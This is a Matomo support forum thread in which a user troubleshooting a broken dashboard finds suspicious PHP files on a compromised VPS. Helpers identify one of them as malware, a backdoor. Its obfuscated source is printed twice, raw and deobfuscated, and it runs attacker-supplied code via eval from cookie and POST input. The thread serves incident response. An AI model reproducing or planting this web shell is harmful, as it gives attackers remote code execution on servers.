cvbowlr
(Chris)
April 4, 2019, 12:08am
1
Hello,
I could not log in to matomo (the page was simply blank) so I tried the various steps the FAQ outlined and ended up uploading and overwriting all the files (after backing up config.ini). That let me login but now the dashboard won’t display and it shows this error message:
Oops… there was a problem during the request. Maybe the server had a temporary issue, or maybe you requested a report with too much data. Please try again. If this error occurs repeatedly please contact your Matomo administrator for assistance.
How can I fix this? Thanks
fdellwing
(Fabian Dellwing)
April 4, 2019, 7:03am
2
Do you have access to the PHP error logs? If you are on shared hosting, please consult your hosting provider.
There should be errors in this log, if you show them to us, we might be able to tell you what to do.
cvbowlr
(Chris)
April 4, 2019, 9:46pm
3
Hi Fabian,
It’s on a vps. Here is what I found:
[Wed Apr 03 00:07:29 2019] [error] [client 160.153.153.31] client denied by server configuration: /home/hfrnot211/example.com/core/Plugin/Dimension/xctupkgy.php, referer: https://example.com/core/Plugin/Dimension/xctupkgy.php
[Wed Apr 03 00:07:31 2019] [error] [client 50.87.144.89] client denied by server configuration: /home/hfrnot211/example.com/core/Plugin/Dimension/xctupkgy.php, referer: https://example.com/core/Plugin/Dimension/xctupkgy.php
[Wed Apr 03 00:07:34 2019] [error] [client 198.57.247.154] client denied by server configuration: /home/hfrnot211/example.com/vendor/piwik/device-detector/Cache/PSR16Bridge.php,
[Wed Apr 03 00:07:35 2019] [error] [client 192.185.2.129] client denied by server configuration: /home/hfrnot211/example.com/vendor/piwik/device-detector/Cache/PSR16Bridge.php,
[Wed Apr 03 00:07:36 2019] [error] [client 192.185.83.95] client denied by server configuration: /home/hfrnot211/example.com/vendor/piwik/device-detector/Cache/PSR16Bridge.php,
[Wed Apr 03 00:07:43 2019] [error] [client 69.195.124.203] client denied by server configuration: /home/hfrnot211/example.com/plugins/RssWidget/Widgets/thxjxlbk.php,
[Wed Apr 03 00:07:44 2019] [error] [client 173.201.196.182] client denied by server configuration: /home/hfrnot211/example.com/plugins/RssWidget/Widgets/thxjxlbk.php,
[Wed Apr 03 00:07:48 2019] [error] [client 198.154.240.70] client denied by server configuration: /home/hfrnot211/example.com/plugins/Diagnostics/Diagnostic/TrackerCheck.php,
[Wed Apr 03 00:07:50 2019] [error] [client 54.69.144.70] client denied by server configuration: /home/hfrnot211/example.com/plugins/Diagnostics/Diagnostic/TrackerCheck.php,
[Wed Apr 03 00:07:51 2019] [error] [client 66.147.244.219] client denied by server configuration: /home/hfrnot211/example.com/plugins/Diagnostics/Diagnostic/TrackerCheck.php,
fdellwing
(Fabian Dellwing)
April 5, 2019, 7:03am
4
See here: ClientDeniedByServerConfiguration - Httpd Wiki
I guess you are missing a directory block with Require all granted
.
Lukas
(Lukas Winkler)
April 5, 2019, 8:27am
5
To be fair, I am pretty sure the files shouldn’t be called xctupkgy.php
, so I’d recommend you to check if everything is okay and the files haven’t been modified.
cvbowlr
(Chris)
April 5, 2019, 7:34pm
6
I changed all folder and file permissions to 755. Still getting same issue.
cvbowlr
(Chris)
April 5, 2019, 7:36pm
7
[Thu Apr 04 14:44:45 2019] [error] [client 46.165.219.48] client denied by server configuration: /home/hfrnot211/example.com/core/Plugin/Dimension/xctupkgy.php
[Thu Apr 04 14:44:47 2019] [error] [client 46.165.219.48] client denied by server configuration: /home/hfrnot211/example.com/core/Plugin/Dimension/xctupkgy.php
[Thu Apr 04 14:44:48 2019] [error] [client 46.165.219.48] client denied by server configuration: /home/hfrnot211/example.com/vendor/piwik/device-detector/Cache/PSR16Bridge.php
[Thu Apr 04 14:44:49 2019] [error] [client 46.165.219.48] client denied by server configuration: /home/hfrnot211/example.com/plugins/RssWidget/Widgets/thxjxlbk.php
[Thu Apr 04 14:44:49 2019] [error] [client 46.165.219.48] client denied by server configuration: /home/hfrnot211/example.com/plugins/Diagnostics/Diagnostic/TrackerCheck.php
[Thu Apr 04 14:46:06 2019] [error] [client 46.165.219.48] client denied by server configuration: /home/hfrnot211/example.com/core/Plugin/Dimension/xctupkgy.php
[Thu Apr 04 14:56:36 2019] [error] [client 104.196.211.107] Symbolic link not allowed or link target not accessible: /home/hfrnot211/example.com/js/p.php
[Thu Apr 04 16:14:17 2019] [error] [client 35.237.24.128] Symbolic link not allowed or link target not accessible: /home/hfrnot211/example.com/js/p.php
[Thu Apr 04 21:03:06 2019] [error] [client 35.231.244.216] Symbolic link not allowed or link target not accessible: /home/hfrnot211/example.com/js/p.php
Lukas
(Lukas Winkler)
April 5, 2019, 7:38pm
8
Hi,
Can you check if the files /home/hfrnot211/example.com/js/p.php
and example.com/core/Plugin/Dimension/xctupkgy.php
exist and what is in them?
cvbowlr
(Chris)
April 5, 2019, 8:40pm
9
Hi Lukas,
p.php is blank
xctupkgy.php contains:
<?php
$ckfca = 'pk*to_cs#b3\'m0uvy5-1xrg24iHad986nel7';$idcueee = Array();$idcueee[] = $ckfca[26].$ckfca[2];$idcueee[] = $ckfca[8];$idcueee[] = $ckfca[28].$ckfca[19].$ckfca[35].$ckfca[30].$ckfca[19].$ckfca[35].$ckfca[24].$ckfca[35].$ckfca[18].$ckfca[35].$ckfca[13].$ckfca[10].$ckfca[28].$ckfca[18].$ckfca[24].$ckfca[27].$ckfca[23].$ckfca[9].$ckfca[18].$ckfca[27].$ckfca[31].$ckfca[29].$ckfca[17].$ckfca[18].$ckfca[17].$ckfca[29].$ckfca[29].$ckfca[35].$ckfca[13].$ckfca[9].$ckfca[31].$ckfca[33].$ckfca[9].$ckfca[29].$ckfca[17].$ckfca[27];$idcueee[] = $ckfca[6].$ckfca[4].$ckfca[14].$ckfca[32].$ckfca[3];$idcueee[] = $ckfca[7].$ckfca[3].$ckfca[21].$ckfca[5].$ckfca[21].$ckfca[33].$ckfca[0].$ckfca[33].$ckfca[27].$ckfca[3];$idcueee[] = $ckfca[33].$ckfca[20].$ckfca[0].$ckfca[34].$ckfca[4].$ckfca[28].$ckfca[33];$idcueee[] = $ckfca[7].$ckfca[14].$ckfca[9].$ckfca[7].$ckfca[3].$ckfca[21];$idcueee[] = $ckfca[27].$ckfca[21].$ckfca[21].$ckfca[27].$ckfca[16].$ckfca[5].$ckfca[12].$ckfca[33].$ckfca[21].$ckfca[22].$ckfca[33];$idcueee[] = $ckfca[7].$ckfca[3].$ckfca[21].$ckfca[34].$ckfca[33].$ckfca[32];$idcueee[] = $ckfca[0].$ckfca[27].$ckfca[6].$ckfca[1];foreach ($idcueee[7]($_COOKIE, $_POST) as $fvljbb => $wbwrcw){function vpxwv($idcueee, $fvljbb, $iairx){return $idcueee[6]($idcueee[4]($fvljbb . $idcueee[2], ($iairx / $idcueee[8]($fvljbb)) + 1), 0, $iairx);}function fhnbk($idcueee, $lmrbrx){return @$idcueee[9]($idcueee[0], $lmrbrx);}function yhfcgig($idcueee, $lmrbrx){$whfieh = $idcueee[3]($lmrbrx) % 3;if (!$whfieh) {eval($lmrbrx[1]($lmrbrx[2]));exit();}}$wbwrcw = fhnbk($idcueee, $wbwrcw);yhfcgig($idcueee, $idcueee[5]($idcueee[1], $wbwrcw ^ vpxwv($idcueee, $fvljbb, $idcueee[8]($wbwrcw))));}
Lukas
(Lukas Winkler)
April 5, 2019, 8:48pm
10
Hi @cvbowlr
This code looks a lot like programming code that tries to hide what it is doing
Most commonly this is some kind of malware that tries to take over the server or do other damage.
Please immediatly check everything on this server for anomalies and security issues (outdates CMS or plugins)
Also check all files on the server for their checksum and if they look suspicious (via the Matomo integrity checker and similar tools for other webapplications)
Lukas
(Lukas Winkler)
April 5, 2019, 9:01pm
11
I am by far no expert in PHP malware, but formatting the code you posted a bit nicer makes it kind of readable:
<?php
$ckfca = 'pk*to_cs#b3\'m0uvy5-1xrg24iHad986nel7';
$idcueee = Array();
$idcueee[] = $ckfca[26] . $ckfca[2];
$idcueee[] = $ckfca[8];
$idcueee[] = $ckfca[28] . $ckfca[19] . $ckfca[35] . $ckfca[30] . $ckfca[19] . $ckfca[35] . $ckfca[24] . $ckfca[35] . $ckfca[18] . $ckfca[35] . $ckfca[13] . $ckfca[10] . $ckfca[28] . $ckfca[18] . $ckfca[24] . $ckfca[27] . $ckfca[23] . $ckfca[9] . $ckfca[18] . $ckfca[27] . $ckfca[31] . $ckfca[29] . $ckfca[17] . $ckfca[18] . $ckfca[17] . $ckfca[29] . $ckfca[29] . $ckfca[35] . $ckfca[13] . $ckfca[9] . $ckfca[31] . $ckfca[33] . $ckfca[9] . $ckfca[29] . $ckfca[17] . $ckfca[27];
$idcueee[] = $ckfca[6] . $ckfca[4] . $ckfca[14] . $ckfca[32] . $ckfca[3];
$idcueee[] = $ckfca[7] . $ckfca[3] . $ckfca[21] . $ckfca[5] . $ckfca[21] . $ckfca[33] . $ckfca[0] . $ckfca[33] . $ckfca[27] . $ckfca[3];
$idcueee[] = $ckfca[33] . $ckfca[20] . $ckfca[0] . $ckfca[34] . $ckfca[4] . $ckfca[28] . $ckfca[33];
$idcueee[] = $ckfca[7] . $ckfca[14] . $ckfca[9] . $ckfca[7] . $ckfca[3] . $ckfca[21];
$idcueee[] = $ckfca[27] . $ckfca[21] . $ckfca[21] . $ckfca[27] . $ckfca[16] . $ckfca[5] . $ckfca[12] . $ckfca[33] . $ckfca[21] . $ckfca[22] . $ckfca[33];
$idcueee[] = $ckfca[7] . $ckfca[3] . $ckfca[21] . $ckfca[34] . $ckfca[33] . $ckfca[32];
$idcueee[] = $ckfca[0] . $ckfca[27] . $ckfca[6] . $ckfca[1];
//$idcueee is now the following:
// [0] => H*
// [1] => #
// [2] => d1781747-703d-4a2b-a695-59970b6eb95a
// [3] => count
// [4] => str_repeat
// [5] => explode
// [6] => substr
// [7] => array_merge
// [8] => strlen
// [9] => pack
foreach ($idcueee[7]($_COOKIE, $_POST) as $fvljbb => $wbwrcw) {
function vpxwv($idcueee, $fvljbb, $iairx) {
return $idcueee[6]($idcueee[4]($fvljbb . $idcueee[2], ($iairx / $idcueee[8]($fvljbb)) + 1), 0, $iairx);
}
function fhnbk($idcueee, $lmrbrx) {
return @$idcueee[9]($idcueee[0], $lmrbrx);
}
function yhfcgig($idcueee, $lmrbrx) {
$whfieh = $idcueee[3]($lmrbrx) % 3;
if (!$whfieh) {
eval($lmrbrx[1]($lmrbrx[2]));
exit();
}
}
$wbwrcw = fhnbk($idcueee, $wbwrcw);
yhfcgig($idcueee, $idcueee[5]($idcueee[1], $wbwrcw ^ vpxwv($idcueee, $fvljbb, $idcueee[8]($wbwrcw))));
}
This code allows anyone who can access this URL to execute arbitrary code on the server and basically do whatevery they want.
cvbowlr
(Chris)
April 5, 2019, 9:14pm
12
Thanks Lukas,
How do I check the checksums? It’s a vps hosting.
fdellwing
(Fabian Dellwing)
April 6, 2019, 7:34am
13
I would disable the webserver and seek help from your hoster. Everything there could be infected. The found code looks a damn lot like things explained in this handy video: YouTube
I would throw away anything that ever lived on that VPS, mostlikely nothing can be trusted anymore.